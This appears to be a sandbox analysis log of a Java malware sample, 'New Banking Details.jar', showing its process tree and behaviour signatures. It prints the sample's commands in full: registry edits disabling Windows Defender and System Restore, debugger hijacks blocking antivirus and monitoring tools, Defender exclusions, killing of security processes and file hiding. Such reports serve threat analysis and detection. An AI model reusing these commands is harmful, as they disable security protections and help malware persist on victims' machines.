PID 320 wrote to memory of 1616 320 cmd.exe 200 PID 320 wrote to memory of 1616 320 cmd.exe 200 PID 320 wrote to memory of 1556 320 cmd.exe 201 PID 320 wrote to memory of 1556 320 cmd.exe 201 PID 320 wrote to memory of 1556 320 cmd.exe 201 PID 1204 wrote to memory of 2024 1204 java.exe 202 PID 1204 wrote to memory of 2024 1204 java.exe 202 PID 1204 wrote to memory of 2024 1204 java.exe 202 PID 2024 wrote to memory of 304 2024 cmd.exe 203 PID 2024 wrote to memory of 304 2024 cmd.exe 203 PID 2024 wrote to memory of 304 2024 cmd.exe 203 PID 2024 wrote to memory of 652 2024 cmd.exe 204 PID 2024 wrote to memory of 652 2024 cmd.exe 204 PID 2024 wrote to memory of 652 2024 cmd.exe 204 PID 1204 wrote to memory of 1944 1204 java.exe 205 PID 1204 wrote to memory of 1944 1204 java.exe 205 PID 1204 wrote to memory of 1944 1204 
java.exe 205 PID 1944 wrote to memory of 1512 1944 cmd.exe 206 PID 1944 wrote to memory of 1512 1944 cmd.exe 206 PID 1944 wrote to memory of 1512 1944 cmd.exe 206 PID 1944 wrote to memory of 1396 1944 cmd.exe 207 PID 1944 wrote to memory of 1396 1944 cmd.exe 207 PID 1944 wrote to memory of 1396 1944 cmd.exe 207 PID 1204 wrote to memory of 1544 1204 java.exe 208 PID 1204 wrote to memory of 1544 1204 java.exe 208 PID 1204 wrote to memory of 1544 1204 java.exe 208 PID 1544 wrote to memory of 1504 1544 cmd.exe 209 PID 1544 wrote to memory of 1504 1544 cmd.exe 209 PID 1544 wrote to memory of 1504 1544 cmd.exe 209 PID 1544 wrote to memory of 1500 1544 cmd.exe 210 PID 1544 wrote to memory of 1500 1544 cmd.exe 210 PID 1544 wrote to memory of 1500 1544 cmd.exe 210 PID 1204 wrote to memory of 1820 1204 java.exe 211 PID 1204 wrote to memory of 1820 1204 java.exe 211 PID 1204 wrote to memory of 1820 1204 java.exe 211 PID 1204 wrote to memory of 1340 1204 java.exe 212 PID 1204 wrote to memory of 1340 1204 java.exe 212 PID 1204 wrote to memory of 1340 1204 java.exe 212 PID 1820 wrote to memory of 1104 1820 cmd.exe 214 PID 1820 wrote to memory of 1104 1820 cmd.exe 214 PID 1820 wrote to memory of 1104 1820 cmd.exe 214 PID 1820 wrote to memory of 1388 1820 cmd.exe 215 PID 1820 wrote to memory of 1388 1820 cmd.exe 215 PID 1820 wrote to memory of 1388 1820 cmd.exe 215 PID 1204 wrote to memory of 1816 1204 java.exe 216 PID 1204 wrote to memory of 1816 1204 java.exe 216 PID 1204 wrote to memory of 1816 1204 java.exe 216 PID 1816 wrote to memory of 1344 1816 cmd.exe 217 PID 1816 wrote to memory of 1344 1816 cmd.exe 217 PID 1816 wrote to memory of 1344 1816 cmd.exe 217 PID 1816 wrote to memory of 1956 1816 cmd.exe 218 PID 1816 wrote to memory of 1956 1816 cmd.exe 218 PID 1816 wrote to memory of 1956 1816 cmd.exe 218 PID 1204 wrote to memory of 844 1204 java.exe 219 PID 1204 wrote to memory of 844 1204 java.exe 219 PID 1204 wrote to memory of 844 1204 java.exe 219 PID 844 wrote to memory 
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process
1828 attrib.exe
1180 attrib.exe
1820 attrib.exe
1764 attrib.exe
1752 attrib.exe
1732 attrib.exe
1792 attrib.exe
1380 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\New Banking Details.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1584
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1792
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1380
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1828
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1180
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
PID:1820
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
PID:1764
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
PID:1752
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class2⤵
- Views/modifies file attributes
PID:1732
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1072
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:672
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1540
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1920
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1884
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1968
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1948
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1992
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1552
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:1544
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1504
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:1632
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1508
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1480
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:620
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1340
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:1636
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:2044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1880
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:2040
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1540
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:1872
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:560
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:852
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:672
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1076
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1592
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:760
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1380
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1756
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1564
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1588
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1692
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:456
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:324
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1904
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1924
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2040
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:464
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1764
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1932
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1948
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1672
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1928
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1616
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1180
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1460
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1344
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1164
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1628
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1672
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1480
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1836
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1340
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:1516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1840
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1388
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1056
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:560
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1952
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1636
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1552
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1628
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1784
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1456
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:296
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:844
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1476
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1644
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:672
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1480
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1840
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1828
-
-
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1056
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64 | depth 3 | PID 1520
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32 | depth 3 | PID 1636
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1784
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64 | depth 3 | PID 464
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32 | depth 3 | PID 1732
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1976
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64 | depth 3 | PID 1548
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32 | depth 3 | PID 1544
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1928
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64 | depth 3 | PID 1064
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32 | depth 3 | PID 1684
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1992
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64 | depth 3 | PID 1664
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32 | depth 3 | PID 2028
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1868
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64 | depth 3 | PID 1480
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32 | depth 3 | PID 1900
C:\Windows\System32\taskkill.exe | "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F | depth 2 | PID 1836
    Signature: Kills process with taskkill
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 560
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64 | depth 3 | PID 1552
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32 | depth 3 | PID 1904
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1612
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64 | depth 3 | PID 1036
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32 | depth 3 | PID 1812
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 320
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64 | depth 3 | PID 1616
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32 | depth 3 | PID 1556
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 2024
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64 | depth 3 | PID 304
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32 | depth 3 | PID 652
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1944
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64 | depth 3 | PID 1512
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32 | depth 3 | PID 1396
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1544
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64 | depth 3 | PID 1504
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32 | depth 3 | PID 1500
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1820
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64 | depth 3 | PID 1104
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32 | depth 3 | PID 1388
C:\Windows\System32\taskkill.exe | "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F | depth 2 | PID 1340
    Signature: Kills process with taskkill
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1816
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64 | depth 3 | PID 1344
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32 | depth 3 | PID 1956
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 844
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1060
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32 | depth 3 | PID 1664
C:\Windows\system32\cmd.exe | cmd.exe | depth 2 | PID 1516
    C:\Windows\system32\reg.exe | reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64 | depth 3 | PID 1604
